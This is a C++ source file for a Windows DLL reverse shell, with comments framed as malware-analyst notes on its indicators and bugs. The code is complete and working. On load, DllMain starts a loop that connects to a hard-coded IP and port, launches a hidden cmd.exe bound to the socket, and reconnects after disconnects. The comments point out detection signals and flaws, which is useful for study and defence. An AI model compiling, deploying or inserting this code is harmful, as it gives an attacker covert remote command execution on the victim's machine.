revshellDLL.cpp
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024
extern __declspec(dllexport) int Run(void);
// Run: exported entry point that loops forever, connecting out over TCP to a
// hard-coded address and, once the peer sends any data, starting cmd.exe with
// its standard handles bound to that socket (a reverse shell).
//
// Analyst notes (all taken from the code below):
//  - Static indicators: the literal peer address and port, the string "cmd.exe",
//    and imports of WSASocket / WSAConnect / CreateProcess in a DLL exporting Run.
//  - Runtime indicators: repeated outbound TCP connects to the same endpoint and
//    a cmd.exe child whose stdin/stdout/stderr are a socket handle.
//  - The function has no normal exit: the loop is unconditional, and the only
//    way out is exit(0), which ends the whole host process.
int Run(void) {
// Peer endpoint is compiled in; there is no configuration or name resolution.
char host[] = "192.168.188.154";
int port = 8443;
while(true) {
// Winsock is initialised and a TCP socket created afresh on every iteration.
// Neither WSAStartup nor WSASocket has its return value checked.
SOCKET socket;
sockaddr_in addr;
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);
socket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(host);
addr.sin_port = htons(port);
// Outbound connect. On failure the loop restarts via `continue`, which skips
// the Sleep() at the bottom, so failed attempts are retried back-to-back; this
// shows up as a rapid burst of connection attempts to one endpoint.
if (WSAConnect(socket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
closesocket(socket);
WSACleanup();
continue;
}
else {
// Wait for the peer to send something before spawning the shell. The received
// bytes are not inspected here; the read only acts as a trigger.
char recvData[DEFAULT_BUFLEN];
memset(recvData, 0, sizeof(recvData));
int recvCode = recv(socket, recvData, DEFAULT_BUFLEN, 0);
if (recvCode <= 0) {
closesocket(socket);
WSACleanup();
continue;
}
else {
// Spawn cmd.exe with inherited handles (bInheritHandles = TRUE) and all three
// standard handles set to the socket. STARTF_USESHOWWINDOW is set while
// wShowWindow stays 0 from the memset, i.e. SW_HIDE, so no window is shown.
// CreateProcess's return value is not checked; if it fails, `pi` is
// uninitialised when it is waited on and closed below.
char proc[] = "cmd.exe";
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE) socket;
CreateProcess(NULL, proc, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
// Block until the child cmd.exe exits, then release its handles.
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
// After the shell ends, read once more from the same socket. This inner
// `recvCode` shadows the outer one declared above.
memset(recvData, 0, sizeof(recvData));
int recvCode = recv(socket, recvData, DEFAULT_BUFLEN, 0);
if (recvCode <= 0) {
closesocket(socket);
WSACleanup();
continue;
}
// A literal "exit\n" from the peer terminates the entire host process, not
// just this DLL. recv() may fill all DEFAULT_BUFLEN bytes, in which case
// recvData has no NUL terminator and strcmp() reads past the buffer.
if (strcmp(recvData, "exit\n") == 0) {
exit(0);
}
}
}
// Reached only when the second recv() returned data other than "exit\n".
// The socket is not closed and WSACleanup() is not called on this path, so one
// socket handle is left open per pass before the 5-second delay and reconnect.
Sleep(5000); // If connection is closed it will try to reconnect
}
// Not reachable: the loop above has no break.
return 0;
}
// DllMain: DLL entry point. On process attach it calls Run() directly, so
// loading the module is sufficient to start the network behaviour; no export
// has to be called by the host.
//
// Analyst notes:
//  - Run() loops forever, so the DLL_PROCESS_ATTACH call does not return and the
//    thread that loaded the DLL stays blocked inside DllMain. A thread parked in
//    a module's entry point with an active outbound socket is a useful triage
//    signal.
//  - Run() performs Winsock calls, creates a process and waits on it from inside
//    DllMain, which Microsoft's DllMain guidance advises against because the
//    entry point runs while the loader lock is held.
//  - Thread attach/detach and process detach do nothing.
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {
switch ( fdwReason ) {
case DLL_PROCESS_ATTACH:
// Starts the connect/spawn loop; control does not come back from here.
Run();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
// Only reached for the non-attach notifications, given Run() never returns.
return TRUE;
}